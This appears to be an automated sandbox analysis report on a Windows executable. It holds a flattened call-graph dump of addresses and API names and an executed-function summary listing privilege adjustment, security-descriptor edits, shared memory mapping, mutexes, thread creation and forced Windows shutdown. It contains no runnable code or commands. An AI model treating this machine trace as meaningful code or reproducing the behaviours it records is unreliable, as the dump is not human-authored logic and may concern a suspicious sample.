67698->67720 67700 11164098 67700->67702 67721 1116a1af 65 API calls __getptd_noexit 67700->67721 67702->67689 67702->67690 67703 1115c8e0 CoInitializeSecurity CoCreateInstance 67702->67703 67704 1115c955 wsprintfW SysAllocString 67703->67704 67705 1115cad4 67703->67705 67709 1115c99b 67704->67709 67706 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 67705->67706 67708 1115cb00 67706->67708 67707 1115cac1 SysFreeString 67707->67705 67708->67694 67709->67707 67710 1115ca2c 67709->67710 67711 1115ca1a wsprintfW 67709->67711 67719 1115caa9 67709->67719 67722 110978f0 67710->67722 67711->67710 67713 1115ca3e 67714 110978f0 275 API calls 67713->67714 67715 1115ca53 67714->67715 67727 110979a0 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 67715->67727 67717 1115ca97 67728 110979a0 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 67717->67728 67719->67707 67720->67700 67721->67702 67723 111101b0 std::locale::_Init 274 API calls 67722->67723 67724 11097923 67723->67724 67725 11097936 SysAllocString 67724->67725 67726 11097954 67724->67726 67725->67726 67726->67713 67727->67717 67728->67719 67729 1102d9f4 67730 1102da01 67729->67730 67731 1102da22 67730->67731 67811 1109f5f0 285 API calls std::locale::_Init 67730->67811 67812 11029490 314 API calls std::locale::_Init 67731->67812 67734 1102da33 67794 11028690 SetEvent 67734->67794 67736 1102da38 67737 1102da42 67736->67737 67738 1102da6f 67736->67738 67737->67736 67813 11059fb0 SetEvent 67737->67813 67740 1102da77 67738->67740 67741 1102daae 67738->67741 67740->67741 67748 1102daa3 Sleep 67740->67748 67742 11147060 std::locale::_Init 21 API calls 67741->67742 67743 1102dab8 67742->67743 67744 1102dac5 67743->67744 67745 1102daf6 67743->67745 67744->67743 67746 1105e820 77 API calls 67744->67746 67747 1102daf3 67745->67747 67795 110b0470 67745->67795 67749 1102dae8 67746->67749 67747->67745 67748->67741 67749->67745 67814 1102d750 304 API calls std::locale::_Init 67749->67814 67756 1102db3a 67757 1102db4d 67756->67757 67816 111361c0 305 API calls 4 library calls 67756->67816 67759 1100d620 FreeLibrary 67757->67759 67760 1102de59 67759->67760 67761 1102de70 67760->67761 67762 1100d330 wsprintfA 67760->67762 67765 1102de97 GetModuleFileNameA GetFileAttributesA 67761->67765 67772 1102dfb3 67761->67772 67763 1102de65 67762->67763 67764 11147060 std::locale::_Init 21 API calls 67763->67764 67764->67761 67767 1102debf 67765->67767 67765->67772 67766 11147060 std::locale::_Init 21 API calls 67769 1102e062 67766->67769 67768 111101b0 std::locale::_Init 274 API calls 67767->67768 67781 1102dec6 67768->67781 67819 11147020 FreeLibrary 67769->67819 67771 1102e06a 67773 1102e0a6 67771->67773 67774 1102e094 ExitWindowsEx 67771->67774 67775 1102e084 ExitWindowsEx Sleep 67771->67775 67772->67766 67776 1102e0b6 67773->67776 67777 1102e0ab Sleep 67773->67777 67774->67773 67775->67774 67778 11147060 std::locale::_Init 21 API calls 67776->67778 67777->67776 67780 1102e0c0 ExitProcess 67778->67780 67782 11143780 86 API calls 67781->67782 67783 1102df0d 67782->67783 67783->67772 67784 11081e00 std::locale::_Init IsDBCSLeadByte 67783->67784 67785 1102df23 67784->67785 67786 1102df3e _memset 67785->67786 67817 11029a70 274 API calls 2 library calls 67785->67817 67788 1102df58 FindFirstFileA 67786->67788 67789 1102df78 FindNextFileA 67788->67789 67791 1102df98 FindClose 67789->67791 67792 1102dfa4 67791->67792 67818 111273e0 301 API calls 4 library calls 67792->67818 67794->67736 67820 110808b0 67795->67820 67800 1102db1a 67804 110eb4a0 67800->67804 67801 110b04b7 67832 11029a70 274 API calls 2 library calls 67801->67832 67805 110b0470 276 API calls 67804->67805 67806 110eb4cd 67805->67806 67848 110ea880 67806->67848 67810 1102db25 67815 110b0660 276 API calls std::locale::_Init 67810->67815 67811->67731 67812->67734 67813->67738 67814->67747 67815->67756 67816->67757 67818->67772 67819->67771 67821 110808d4 67820->67821 67822 110808d8 67821->67822 67823 110808ef 67821->67823 67833 11029a70 274 API calls 2 library calls 67822->67833 67825 11080908 67823->67825 67826 110808ec 67823->67826 67829 110b0460 67825->67829 67826->67823 67834 11029a70 274 API calls 2 library calls 67826->67834 67835 11081590 67829->67835 67836 110815b1 67835->67836 67837 110815dd 67835->67837 67836->67837 67838 110815cb 67836->67838 67840 1108162a wsprintfA 67837->67840 67841 11081605 wsprintfA 67837->67841 67839 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 67838->67839 67842 110815d9 67839->67842 67847 11029a70 274 API calls 2 library calls 67840->67847 67841->67837 67842->67800 67842->67801 67850 110ea88b 67848->67850 67849 110ea925 67858 110b0660 276 API calls std::locale::_Init 67849->67858 67850->67849 67851 110ea8ae 67850->67851 67852 110ea8c5 67850->67852 67859 11029a70 274 API calls 2 library calls 67851->67859 67854 110ea8c2 67852->67854 67855 110ea8f2 SendMessageTimeoutA 67852->67855 67854->67852 67860 11029a70 274 API calls 2 library calls 67854->67860 67855->67849 67858->67810 67861 110310d5 GetNativeSystemInfo 67862 110310e1 67861->67862 67865 11031081 67862->67865 67866 11031145 67862->67866 67874 11031088 67862->67874 67863 110312db GetStockObject GetObjectA 67864 1103130a SetErrorMode SetErrorMode 67863->67864 67870 111101b0 std::locale::_Init 274 API calls 67864->67870 67868 111101b0 std::locale::_Init 274 API calls 67865->67868 67869 111101b0 std::locale::_Init 274 API calls 67866->67869 67868->67874 67869->67874 67871 11031346 67870->67871 67872 11028980 278 API calls 67871->67872 67873 11031360 67872->67873 67875 111101b0 std::locale::_Init 274 API calls 67873->67875 67874->67863 67876 11031386 67875->67876 67877 11028980 278 API calls 67876->67877 67878 1103139f InterlockedExchange 67877->67878 67880 111101b0 std::locale::_Init 274 API calls 67878->67880 67881 110313c7 67880->67881 67882 1108a880 277 API calls 67881->67882 67883 110313df GetACP 67882->67883 67885 11163f93 _sprintf 104 API calls 67883->67885 67886 11031406 67885->67886 67887 111663a3 _setlocale 113 API calls 67886->67887 67888 11031410 67887->67888 67889 11143780 86 API calls 67888->67889 67890 1103143c 67889->67890 67891 111101b0 std::locale::_Init 274 API calls 67890->67891 67892 1103145c 67891->67892 67893 11061aa0 314 API calls 67892->67893 67895 11031487 67893->67895 67894 110314d4 67898 111101b0 std::locale::_Init 274 API calls 67894->67898 67895->67894 67896 111101b0 std::locale::_Init 274 API calls 67895->67896 67897 110314ae 67896->67897 67899 11061710 304 API calls 67897->67899 67900 11031501 67898->67900 67899->67894 67901 11125d40 481 API calls 67900->67901 67902 11031523 67901->67902 67903 111101b0 std::locale::_Init 274 API calls 67902->67903 67904 1103155b 67903->67904 67905 11088b30 278 API calls 67904->67905 67906 11031573 67905->67906 67907 111101b0 std::locale::_Init 274 API calls 67906->67907 67908 1103158a 67907->67908 67909 1105cdb0 333 API calls 67908->67909 67910 110315ae 67909->67910 67911 1105d1a0 439 API calls 67910->67911 67912 110315d4 67911->67912 67913 11027810 123 API calls 67912->67913 67914 110315d9 67913->67914 67915 1100d620 FreeLibrary 67914->67915 67916 110315f4 67915->67916 67917 1103160d 67916->67917 67918 1100d330 wsprintfA 67916->67918 67920 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 67917->67920 67919 11031602 67918->67919 67921 11147060 std::locale::_Init 21 API calls 67919->67921 67922 11031773 67920->67922 67921->67917 67923 11089cf0 67924 111103d0 ___DllMainCRTStartup 4 API calls 67923->67924 67925 11089d03 67924->67925 67926 11089d0d 67925->67926 67935 11089430 277 API calls std::locale::_Init 67925->67935 67928 11089d34 67926->67928 67936 11089430 277 API calls std::locale::_Init 67926->67936 67931 11089d43 67928->67931 67932 11089cc0 67928->67932 67937 11089950 67932->67937 67935->67926 67936->67928 67938 11088c40 67937->67938 67939 11089989 GetParent 67938->67939 67940 1108999c 67939->67940 67941 110899ad 67939->67941 67942 110899a0 GetParent 67940->67942 67943 11145990 276 API calls 67941->67943 67942->67941 67942->67942 67944 110899b9 67943->67944 67945 11164ead std::locale::_Init 142 API calls 67944->67945 67946 110899c6 std::ios_base::_Ios_base_dtor 67945->67946 67947 11145990 276 API calls 67946->67947 67948 110899df 67947->67948 67974 11013dd0 22 API calls 2 library calls 67948->67974 67950 110899fa 67950->67950 67951 11143e00 std::locale::_Init 8 API calls 67950->67951 67952 11089a3a std::ios_base::_Ios_base_dtor 67951->67952 67953 11164c77 std::locale::_Init 101 API calls 67952->67953 67954 11089a73 std::locale::_Init 67952->67954 67953->67954 67955 1102ad70 std::locale::_Init 144 API calls 67954->67955 67963 11089b24 std::ios_base::_Ios_base_dtor 67954->67963 67958 11089ac3 67955->67958 67956 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 67957 11089c12 67956->67957 67957->67931 67959 11081e00 std::locale::_Init IsDBCSLeadByte 67958->67959 67960 11089ae2 67959->67960 67961 11081e70 86 API calls 67960->67961 67960->67963 67962 11089afa 67961->67962 67964 11089b3e 67962->67964 67965 11089b01 67962->67965 67963->67956 67966 11081e70 86 API calls 67964->67966 67975 110b7aa0 67965->67975 67968 11089b49 67966->67968 67968->67963 67971 110b7aa0 67 API calls 67968->67971 67970 110b7aa0 67 API calls 67970->67963 67972 11089b56 67971->67972 67972->67963 67973 110b7aa0 67 API calls 67972->67973 67973->67963 67974->67950 67978 110b7a80 67975->67978 67981 111681a3 67978->67981 67984 11168124 67981->67984 67985 11168131 67984->67985 67986 1116814b 67984->67986 68002 1116a1c2 65 API calls __getptd_noexit 67985->68002 67986->67985 67987 11168154 GetFileAttributesA 67986->67987 67989 11168162 GetLastError 67987->67989 67995 11168178 67987->67995 68005 1116a1d5 65 API calls 2 library calls 67989->68005 67990 11168136 68003 1116a1af 65 API calls __getptd_noexit 67990->68003 67993 11089b07 67993->67963 67993->67970 67994 1116816e 68006 1116a1af 65 API calls __getptd_noexit 67994->68006 67995->67993 68007 1116a1c2 65 API calls __getptd_noexit 67995->68007 67996 1116813d 68004 1116edc4 __call_reportfault GetCurrentProcess TerminateProcess DecodePointer __write 67996->68004 68000 1116818b 68008 1116a1af 65 API calls __getptd_noexit 68000->68008 68002->67990 68003->67996 68004->67993 68005->67994 68006->67993 68007->68000 68008->67994 68009 11030b78 68010 11030b86 68009->68010 68011 11143780 86 API calls 68010->68011 68012 11030bc3 68011->68012 68013 11030bd8 68012->68013 68015 11081e70 86 API calls 68012->68015 68014 110ed520 8 API calls 68013->68014 68016 11030bff 68014->68016 68015->68013 68017 11030c49 68016->68017 68076 110ed5d0 79 API calls 2 library calls 68016->68076 68021 11143780 86 API calls 68017->68021 68019 11030c14 68077 110ed5d0 79 API calls 2 library calls 68019->68077 68023 11030c60 68021->68023 68022 11030c2b 68022->68017 68025 11146fe0 19 API calls 68022->68025 68024 111101b0 std::locale::_Init 274 API calls 68023->68024 68026 11030c6f 68024->68026 68025->68017 68027 11088b30 278 API calls 68026->68027 68028 11030c90 68026->68028 68027->68028 68029 1108a880 277 API calls 68028->68029 68030 11030ca3 OpenMutexA 68029->68030 68031 11030cc3 CreateMutexA 68030->68031 68032 11030dda CloseHandle 68030->68032 68033 11030ce3 68031->68033 68069 1108a980 68032->68069 68035 111101b0 std::locale::_Init 274 API calls 68033->68035 68037 11030cf8 68035->68037 68036 11030df0 68038 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 68036->68038 68039 11030d1b 68037->68039 68041 11061710 304 API calls 68037->68041 68040 11031773 68038->68040 68059 110161e0 LoadLibraryA 68039->68059 68041->68039 68043 11030d2d 68044 11145c70 std::locale::_Init 91 API calls 68043->68044 68045 11030d3c 68044->68045 68046 11030d49 68045->68046 68047 11030d5c 68045->68047 68060 111466b0 68046->68060 68048 11030d66 GetProcAddress 68047->68048 68051 11030d50 68047->68051 68050 11030d80 SetLastError 68048->68050 68048->68051 68050->68051 68052 110287a0 47 API calls 68051->68052 68053 11030d8d 68052->68053 68078 11009370 440 API calls std::locale::_Init 68053->68078 68055 11030d9c 68056 11030db0 WaitForSingleObject 68055->68056 68056->68056 68057 11030dc2 CloseHandle 68056->68057 68057->68032 68058 11030dd3 FreeLibrary 68057->68058 68058->68032 68059->68043 68061 11145c70 std::locale::_Init 91 API calls 68060->68061 68062 111466c2 68061->68062 68063 11146700 68062->68063 68064 111466c9 LoadLibraryA 68062->68064 68063->68051 68065 111466fa 68064->68065 68066 111466db GetProcAddress 68064->68066 68065->68051 68067 111466f3 FreeLibrary 68066->68067 68068 111466eb 68066->68068 68067->68065 68068->68067 68070 1108aa27 68069->68070 68074 1108a9ba std::ios_base::_Ios_base_dtor 68069->68074 68071 1108aa2e DeleteCriticalSection 68070->68071 68079 1115c2d0 68071->68079 68072 1108a9ce CloseHandle 68072->68074 68074->68070 68074->68072 68074->68074 68075 1108aa54 std::ios_base::_Ios_base_dtor 68075->68036 68076->68019 68077->68022 68078->68055 68080 1115c2e4 68079->68080 68081 1115c2e8 68080->68081 68083 1115c040 68 API calls 2 library calls 68080->68083 68081->68075 68083->68080 68084 1116a5cd 68085 1116a5dd 68084->68085 68086 1116a5d8 68084->68086 68090 1116a4d7 68085->68090 68102 11177f37 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 68086->68102 68089 1116a5eb 68091 1116a4e3 __write 68090->68091 68095 1116a530 68091->68095 68101 1116a580 __write 68091->68101 68103 1116a373 68091->68103 68094 1116a543 68096 1116a560 68094->68096 68098 11026410 ___DllMainCRTStartup 7 API calls 68094->68098 68095->68101 68152 11026410 68095->68152 68097 1116a373 __CRT_INIT@12 147 API calls 68096->68097 68096->68101 68097->68101 68099 1116a557 68098->68099 68100 1116a373 __CRT_INIT@12 147 API calls 68099->68100 68100->68096 68101->68089 68102->68085 68104 1116a37f __write 68103->68104 68105 1116a387 68104->68105 68106 1116a401 68104->68106 68161 1116e390 HeapCreate 68105->68161 68108 1116a407 68106->68108 68109 1116a462 68106->68109 68114 1116a425 68108->68114 68117 1116a390 __write 68108->68117 68252 1116e65b 65 API calls _doexit 68108->68252 68110 1116a467 68109->68110 68111 1116a4c0 68109->68111 68113 1116c4ba ___set_flsgetvalue 3 API calls 68110->68113 68111->68117 68258 1116c7be 78 API calls __freefls@4 68111->68258 68112 1116a38c 68112->68117 68162 1116c82c GetModuleHandleW 68112->68162 68116 1116a46c 68113->68116 68120 1116a439 68114->68120 68253 1117226e 66 API calls _free 68114->68253 68121 1116ac7e __calloc_crt 65 API calls 68116->68121 68117->68095 68256 1116a44c 69 API calls __mtterm 68120->68256 68124 1116a478 68121->68124 68124->68117 68128 1116a484 DecodePointer FlsSetValue 68124->68128 68125 1116a39c __RTC_Initialize 68126 1116a3a0 68125->68126 68134 1116a3ac GetCommandLineA 68125->68134 68249 1116e3ae HeapDestroy 68126->68249 68127 1116a42f 68254 1116c50b 69 API calls _free 68127->68254 68131 1116a4b4 68128->68131 68132 1116a49d 68128->68132 68136 11163aa5 _free 65 API calls 68131->68136 68257 1116c548 65 API calls 4 library calls 68132->68257 68133 1116a434 68255 1116e3ae HeapDestroy 68133->68255 68187 11177e54 GetEnvironmentStringsW 68134->68187 68136->68117 68139 1116a4a4 GetCurrentThreadId 68139->68117 68143 1116a3ca 68250 1116c50b 69 API calls _free 68143->68250 68147 1116a3ea 68147->68117 68251 1117226e 66 API calls _free 68147->68251 68153 111104e0 68152->68153 68154 11110501 68153->68154 68155 111104ec 68153->68155 68157 11110514 ___DllMainCRTStartup 68153->68157 68276 11110430 68154->68276 68155->68157 68158 11110430 ___DllMainCRTStartup 7 API calls 68155->68158 68157->68094 68160 111104f5 68158->68160 68159 11110508 68159->68094 68160->68094 68161->68112 68163 1116c840 68162->68163 68164 1116c849 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 68162->68164 68259 1116c50b 69 API calls _free 68163->68259 68166 1116c893 TlsAlloc 68164->68166 68169 1116c8e1 TlsSetValue 68166->68169 68171 1116c9a2 68166->68171 68167 1116c845 68167->68125 68170 1116c8f2 68169->68170 68169->68171 68260 1116e417 EncodePointer EncodePointer __init_pointers __initp_misc_winsig 68170->68260 68171->68125 68173 1116c8f7 EncodePointer EncodePointer EncodePointer EncodePointer 68261 11174425 InitializeCriticalSectionAndSpinCount 68173->68261 68175 1116c936 68176 1116c99d 68175->68176 68177 1116c93a DecodePointer 68175->68177 68263 1116c50b 69 API calls _free 68176->68263 68179 1116c94f 68177->68179 68179->68176 68180 1116ac7e __calloc_crt 65 API calls 68179->68180 68181 1116c965 68180->68181 68181->68176 68182 1116c96d DecodePointer 68181->68182 68183 1116c97e 68182->68183 68183->68176 68184 1116c982 68183->68184 68262 1116c548 65 API calls 4 library calls 68184->68262 68186 1116c98a GetCurrentThreadId 68186->68171 68188 11177e70 WideCharToMultiByte 68187->68188 68189 1116a3bc 68187->68189 68191 11177ea5 68188->68191 68192 11177edd FreeEnvironmentStringsW 68188->68192 68200 11172029 GetStartupInfoW 68189->68200 68193 1116ac39 __malloc_crt 65 API calls 68191->68193 68192->68189 68194 11177eab 68193->68194 68194->68192 68195 11177eb3 WideCharToMultiByte 68194->68195 68196 11177ec5 68195->68196 68197 11177ed1 FreeEnvironmentStringsW 68195->68197 68198 11163aa5 _free 65 API calls 68196->68198 68197->68189 68199 11177ecd 68198->68199 68199->68197 68201 1116ac7e __calloc_crt 65 API calls 68200->68201 68212 11172047 68201->68212 68202 111721f2 GetStdHandle 68208 111721bc 68202->68208 68203 1116ac7e __calloc_crt 65 API calls 68203->68212 68204 11172256 SetHandleCount 68207 1116a3c6 68204->68207 68205 11172204 GetFileType 68205->68208 68206 1117213c 68206->68208 68209 11172173 InitializeCriticalSectionAndSpinCount 68206->68209 68210 11172168 GetFileType 68206->68210 68207->68143 68213 11177d99 68207->68213 68208->68202 68208->68204 68208->68205 68211 1117222a InitializeCriticalSectionAndSpinCount 68208->68211 68209->68206 68209->68207 68210->68206 68210->68209 68211->68207 68211->68208 68212->68203 68212->68206 68212->68207 68212->68208 68212->68212 68214 11177db3 GetModuleFileNameA 68213->68214 68215 11177dae 68213->68215 68216 11177dda 68214->68216 68270 11171a45 91 API calls __setmbcp 68215->68270 68264 11177bff 68216->68264 68220 1116ac39 __malloc_crt 65 API calls 68221 11177e1c 68220->68221 68222 11177bff _parse_cmdline 75 API calls 68221->68222 68223 1116a3d6 68221->68223 68222->68223 68223->68147 68224 11177b23 68223->68224 68225 11177b2c 68224->68225 68229 11177b31 68224->68229 68272 11171a45 91 API calls __setmbcp 68225->68272 68227 11177b5d 68230 1116ac7e __calloc_crt 65 API calls 68227->68230 68228 11177b4c _strlen 68228->68229 68229->68227 68229->68228 68235 1116a3df 68229->68235 68236 11177b66 68230->68236 68231 11177bb5 68233 11163aa5 _free 65 API calls 68231->68233 68232 11177b7d _strlen 68232->68236 68233->68235 68234 1116ac7e __calloc_crt 65 API calls 68234->68236 68235->68147 68243 1116e46e 68235->68243 68236->68231 68236->68232 68236->68234 68236->68235 68237 11177bdb 68236->68237 68239 1116cd5f _strcpy_s 65 API calls 68236->68239 68240 11177bf2 68236->68240 68238 11163aa5 _free 65 API calls 68237->68238 68238->68235 68239->68236 68273 1116ed72 __call_reportfault GetCurrentProcess TerminateProcess 68240->68273 68242 11177bfe 68244 1116e47c __IsNonwritableInCurrentImage 68243->68244 68274 1116d88b EncodePointer 68244->68274 68246 1116e49a __initterm_e 68248 1116e4bb __IsNonwritableInCurrentImage 68246->68248 68275 11163dd5 73 API calls __cinit 68246->68275 68248->68147 68249->68117 68250->68126 68251->68143 68252->68114 68253->68127 68254->68133 68255->68120 68256->68117 68257->68139 68258->68117 68259->68167 68260->68173 68261->68175 68262->68186 68263->68171 68266 11177c1e 68264->68266 68268 11177c8b 68266->68268 68271 11177590 75 API calls x_ismbbtype_l 68266->68271 68267 11177d89 68267->68220 68267->68223 68268->68267 68269 11177590 75 API calls _parse_cmdline 68268->68269 68269->68268 68270->68214 68271->68266 68272->68229 68273->68242 68274->68246 68275->68248 68277 11110474 EnterCriticalSection 68276->68277 68278 1111045f InitializeCriticalSection 68276->68278 68279 11110495 68277->68279 68278->68277 68280 111104c3 LeaveCriticalSection 68279->68280 68281 111103d0 ___DllMainCRTStartup 4 API calls 68279->68281 68280->68159 68281->68279

                                                                                Executed Functions

                                                                                Function 1109E5B0 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501filethreadmemoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 774 1109e5b0-1109e612 call 1109dda0 777 1109e618-1109e63b call 1109d860 774->777 778 1109ec30 774->778 784 1109e641-1109e655 LocalAlloc 777->784 785 1109e7a4-1109e7a6 777->785 779 1109ec32-1109ec4d call 11162bb7 778->779 787 1109e65b-1109e68d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 784->787 788 1109ec25-1109ec2b call 1109d8f0 784->788 786 1109e736-1109e75b CreateFileMappingA 785->786 790 1109e7a8-1109e7bb GetLastError 786->790 791 1109e75d-1109e77d GetLastError call 110d6c20 786->791 792 1109e71a-1109e730 787->792 793 1109e693-1109e6be call 1109d7d0 call 1109d810 787->793 788->778 794 1109e7bd 790->794 795 1109e7c2-1109e7d9 MapViewOfFile 790->795 806 1109e788-1109e790 791->806 807 1109e77f-1109e786 LocalFree 791->807 792->786 817 1109e709-1109e711 793->817 818 1109e6c0-1109e6f6 GetSecurityDescriptorSacl 793->818 794->795 799 1109e7db-1109e7f6 call 110d6c20 795->799 800 1109e817-1109e81f 795->800 820 1109e7f8-1109e7f9 LocalFree 799->820 821 1109e7fb-1109e803 799->821 804 1109e8c1-1109e8d3 800->804 805 1109e825-1109e83e GetModuleFileNameA 800->805 810 1109e919-1109e932 call 11162be0 GetTickCount 804->810 811 1109e8d5-1109e8d8 804->811 812 1109e8dd-1109e8f8 call 110d6c20 805->812 813 1109e844-1109e84d 805->813 814 1109e792-1109e793 LocalFree 806->814 815 1109e795-1109e79f 806->815 807->806 839 1109e934-1109e939 810->839 822 1109e9bf-1109ea23 GetCurrentProcessId GetModuleFileNameA call 1109dc30 811->822 837 1109e8fa-1109e8fb LocalFree 812->837 838 1109e8fd-1109e905 812->838 813->812 823 1109e853-1109e856 813->823 814->815 816 1109ec1e-1109ec20 call 1109dce0 815->816 816->788 817->792 827 1109e713-1109e714 FreeLibrary 817->827 818->817 826 1109e6f8-1109e703 SetSecurityDescriptorSacl 818->826 820->821 829 1109e808-1109e812 821->829 830 1109e805-1109e806 LocalFree 821->830 841 1109ea2b-1109ea42 CreateEventA 822->841 842 1109ea25 822->842 833 1109e899-1109e8bc call 110d6c20 call 1109dce0 823->833 834 1109e858-1109e85c 823->834 826->817 827->792 829->816 830->829 833->804 834->833 836 1109e85e-1109e869 834->836 843 1109e870-1109e874 836->843 837->838 844 1109e90a-1109e914 838->844 845 1109e907-1109e908 LocalFree 838->845 846 1109e93b-1109e94a 839->846 847 1109e94c 839->847 851 1109ea44-1109ea63 GetLastError * 2 call 110d6c20 841->851 852 1109ea66-1109ea6e 841->852 842->841 849 1109e890-1109e892 843->849 850 1109e876-1109e878 843->850 844->816 845->844 846->839 846->847 853 1109e94e-1109e954 847->853 858 1109e895-1109e897 849->858 855 1109e87a-1109e880 850->855 856 1109e88c-1109e88e 850->856 851->852 859 1109ea70 852->859 860 1109ea76-1109ea87 CreateEventA 852->860 861 1109e965-1109e9bd 853->861 862 1109e956-1109e963 853->862 855->849 863 1109e882-1109e88a 855->863 856->858 858->812 858->833 859->860 865 1109ea89-1109eaa8 GetLastError * 2 call 110d6c20 860->865 866 1109eaab-1109eab3 860->866 861->822 862->853 862->861 863->843 863->856 865->866 868 1109eabb-1109eacd CreateEventA 866->868 869 1109eab5 866->869 871 1109eacf-1109eaee GetLastError * 2 call 110d6c20 868->871 872 1109eaf1-1109eaf9 868->872 869->868 871->872 874 1109eafb 872->874 875 1109eb01-1109eb12 CreateEventA 872->875 874->875 877 1109eb34-1109eb42 875->877 878 1109eb14-1109eb31 GetLastError * 2 call 110d6c20 875->878 880 1109eb44-1109eb45 LocalFree 877->880 881 1109eb47-1109eb4f 877->881 878->877 880->881 883 1109eb51-1109eb52 LocalFree 881->883 884 1109eb54-1109eb5d 881->884 883->884 885 1109eb63-1109eb66 884->885 886 1109ec07-1109ec19 call 110d6c20 884->886 885->886 888 1109eb6c-1109eb6f 885->888 886->816 888->886 890 1109eb75-1109eb78 888->890 890->886 891 1109eb7e-1109eb81 890->891 892 1109eb8c-1109eba8 CreateThread 891->892 893 1109eb83-1109eb89 GetCurrentThreadId 891->893 894 1109ebaa-1109ebb4 892->894 895 1109ebb6-1109ebc0 892->895 893->892 894->816 896 1109ebda-1109ec05 SetEvent call 110d6c20 call 1109d8f0 895->896 897 1109ebc2-1109ebd8 ResetEvent * 3 895->897 896->779 897->896
                                                                                APIs
                                                                                  • Part of subcall function 1109D860: GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,1B702977,00080000,00000000,?), ref: 1109D88D
                                                                                  • Part of subcall function 1109D860: OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                                  • Part of subcall function 1109D860: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
                                                                                  • Part of subcall function 1109D860: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                                • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,1B702977,00080000,00000000,?), ref: 1109E645
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E65E
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E669
                                                                                • GetVersionExA.KERNEL32(?), ref: 1109E680
                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E6EE
                                                                                • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E703
                                                                                • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E714
                                                                                • CreateFileMappingA.KERNEL32(000000FF,11030703,00000004,00000000,?,?), ref: 1109E750
                                                                                • GetLastError.KERNEL32 ref: 1109E75D
                                                                                • LocalFree.KERNEL32(?), ref: 1109E786
                                                                                • LocalFree.KERNEL32(?), ref: 1109E793
                                                                                • GetLastError.KERNEL32 ref: 1109E7B0
                                                                                • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E7CE
                                                                                • LocalFree.KERNEL32(?), ref: 1109E7F9
                                                                                • LocalFree.KERNEL32(?), ref: 1109E806
                                                                                  • Part of subcall function 1109D7D0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E69E), ref: 1109D7D8
                                                                                  • Part of subcall function 1109D810: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D824
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E832
                                                                                • LocalFree.KERNEL32(?), ref: 1109E8FB
                                                                                • LocalFree.KERNEL32(?), ref: 1109E908
                                                                                • _memset.LIBCMT ref: 1109E920
                                                                                • GetTickCount.KERNEL32 ref: 1109E928
                                                                                • GetCurrentProcessId.KERNEL32 ref: 1109E9D4
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E9EF
                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109EA3B
                                                                                • GetLastError.KERNEL32 ref: 1109EA44
                                                                                • GetLastError.KERNEL32(00000000), ref: 1109EA4B
                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EA80
                                                                                • GetLastError.KERNEL32 ref: 1109EA89
                                                                                • GetLastError.KERNEL32(00000000), ref: 1109EA90
                                                                                • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109EAC6
                                                                                • GetLastError.KERNEL32 ref: 1109EACF
                                                                                • GetLastError.KERNEL32(00000000), ref: 1109EAD6
                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EB0B
                                                                                • GetLastError.KERNEL32 ref: 1109EB1A
                                                                                • GetLastError.KERNEL32(00000000), ref: 1109EB1D
                                                                                • LocalFree.KERNEL32(?), ref: 1109EB45
                                                                                • LocalFree.KERNEL32(?), ref: 1109EB52
                                                                                • GetCurrentThreadId.KERNEL32 ref: 1109EB83
                                                                                • CreateThread.KERNEL32(00000000,00002000,Function_0009E140,00000000,00000000,00000030), ref: 1109EB9D
                                                                                • ResetEvent.KERNEL32(?), ref: 1109EBCC
                                                                                • ResetEvent.KERNEL32(?), ref: 1109EBD2
                                                                                • ResetEvent.KERNEL32(?), ref: 1109EBD8
                                                                                • SetEvent.KERNEL32(?), ref: 1109EBDE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
